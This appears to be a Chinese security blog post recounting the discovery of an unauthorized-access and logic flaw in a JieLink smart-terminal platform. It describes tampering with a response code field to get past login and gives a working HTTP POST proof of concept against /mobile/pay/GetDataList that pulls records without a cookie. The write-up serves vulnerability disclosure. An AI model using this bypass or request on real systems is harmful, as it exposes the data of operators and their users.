记一次CNVD漏洞(jielink)的挖掘(上)

admin 2024年7月8日16:22:43评论4 views字数 1131阅读3分46秒阅读模式

一、风鸟企业查询

这里给师傅们推荐下风鸟:https://www.riskbird.com/
是一个免费的企业查询,一般在挖CNVD漏洞的时候需要满足实缴资产,所以一般都需要一个这个来查询,这个主要就是免费,蛮不错的!!!

记一次CNVD漏洞(jielink)的挖掘(上)

可以看到查询结果,是上市公司满足我们的需求,那么就可以开始进行旗下的资产收集了。

二、资产收集

通过在风鸟里面,我找到了很多里面的系统,发现Jiexxx智能终端操作平台这个系统

记一次CNVD漏洞(jielink)的挖掘(上)

里面有很多的相关系统,但是部分系统已经修复了,但是里面那么多,肯定还是有搞头的,可以多尝试下。

三、漏洞利用

bp抓包分析
1、抓取该系统的登录包,发现返回包是一些前端的东西,无法利用

记一次CNVD漏洞(jielink)的挖掘(上)

2、所有猜测应该还存在一个手机移动端,可以使用/mobile目录

记一次CNVD漏洞(jielink)的挖掘(上)

成功找到了移动端,如下:

记一次CNVD漏洞(jielink)的挖掘(上)

3、然后再抓下这个手机移动端的数据包,尝试看看有没有未授权访问/逻辑缺陷漏洞

、、

记一次CNVD漏洞(jielink)的挖掘(上)

4、发现这里返回包有一个code字段,这个是可以进行修改下的,抓包然后把这个返回包的code该成0试试(逻辑缺陷漏洞)

记一次CNVD漏洞(jielink)的挖掘(上)

5、成功进入后台了,未授权访问漏洞

记一次CNVD漏洞(jielink)的挖掘(上)

点击查询用户信息,抓这个包

记一次CNVD漏洞(jielink)的挖掘(上)

把cookie删掉,发现返回包还是正常,那么说明存在未授权

记一次CNVD漏洞(jielink)的挖掘(上)

6、接下来我们就构造下POC,然后在web电脑端尝试下未授权访问

POC如下

  1. POST /mobile/pay/GetDataList HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
  4. Accept: application/json, text/plain, */*
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. X-Requested-With: XMLHttpRequest
  8. Content-Type: application/x-www-form-urlencoded
  9. Content-Length: 25
  10. Connection: close
  11. Priority: u=1
  12. pageSize=1000&pageIndex=1

7、抓取这个登录页面的数据包,然后利用上面的POC进行修改如下两个地方,达到未授权访问漏洞

记一次CNVD漏洞(jielink)的挖掘(上)

成功拿到了开始我们登录不进来的web页面端的数据了

记一次CNVD漏洞(jielink)的挖掘(上)

备注:(漏洞已在CNVD提交,但已重复未归档)

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

 

原文始发于微信公众号(掌控安全EDU):记一次CNVD漏洞的挖掘(上)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月8日16:22:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次CNVD漏洞(jielink)的挖掘(上)http://cn-sec.com/archives/2926354.html

发表评论

匿名网友 填写信息